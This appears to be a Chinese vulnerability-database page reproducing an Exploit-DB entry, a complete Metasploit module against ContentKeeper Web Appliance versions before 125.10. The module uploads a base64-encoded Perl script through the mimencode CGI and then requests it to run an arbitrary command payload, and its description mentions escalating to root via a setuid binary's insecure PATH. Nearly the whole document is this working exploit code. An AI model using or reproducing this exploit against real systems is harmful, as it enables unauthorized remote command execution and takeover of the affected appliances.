ContentKeeper Web Appliance < 125.10 - Command Execution (Metasploit)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057489 漏洞类型
发布时间 2009-02-25 更新时间 2009-02-25
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/9916
|漏洞详情
漏洞细节尚未披露
|漏洞EXP 
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'ContentKeeper Web Remote Command Execution',
			'Description'	=> %q{
				This module exploits the ContentKeeper Web Appliance. Versions prior
				to 125.10 are affected. This module exploits a combination of weaknesses
				to enable remote command execution as the Apache user. Following exploitation
				it is possible to abuse an insecure PATH call to 'ps' etc in setuid 'benetool'
				to escalate to root.
			},
			'Author' 	=> [ 'patrick' ],
			'Arch'		=> [ ARCH_CMD ],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision$',
			'References'    =>
			[
				[ 'OSVDB', '54551'],
				[ 'OSVDB', '54552'],
				[ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
			],
			'Privileged'		=> false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby telnet',
						}
				},			
			'Platform' => ['unix'],
			'Targets'  =>
			[
				[ 'Automatic', { } ]
			],
			'DisclosureDate' => 'Feb 25 2009',
			'DefaultTarget' => 0))

			register_options(
			[
				Opt::RPORT(80),
			],self.class)
	end

	def check
		connect
		sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n")
		banner = sock.get(-1,3)
		disconnect

		if (banner =~ /500 Internal/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end

	def exploit

		exp = "#!/usr/bin/perl\n"
		exp << "print \"Content-type: text/html\\n\\n\"\;\n\n"
		exp << "system(\""
		exp << payload.encoded.gsub('"', '\"')
		exp << "\");\n"

		body = Rex::Text.encode_base64(exp)

		connect

		sploit = "POST /cgi-bin/ck/mimencode?-u+-o+bak.txt HTTP/1.1\r\n"
		sploit << "Host: #{datastore['RHOST']}\r\n"
		sploit << "Content-Length: #{body.length}\r\n\r\n"

		print_status("Uploading payload to target.")
		sock.put(sploit + body + "\r\n\r\n")
		disconnect

		sleep(5)
		print_status("Calling payload...")
		connect
		req = "GET /cgi-bin/ck/bak.txt HTTP/1.1\r\n" # bak.txt is owned by apache, chmod 777 :) rwx
		req << "Host: #{datastore['RHOST']}\r\n"
		sock.put(req + "\r\n\r\n")

		handler
		disconnect
	end
end
检索漏洞
开始时间
结束时间
相关漏洞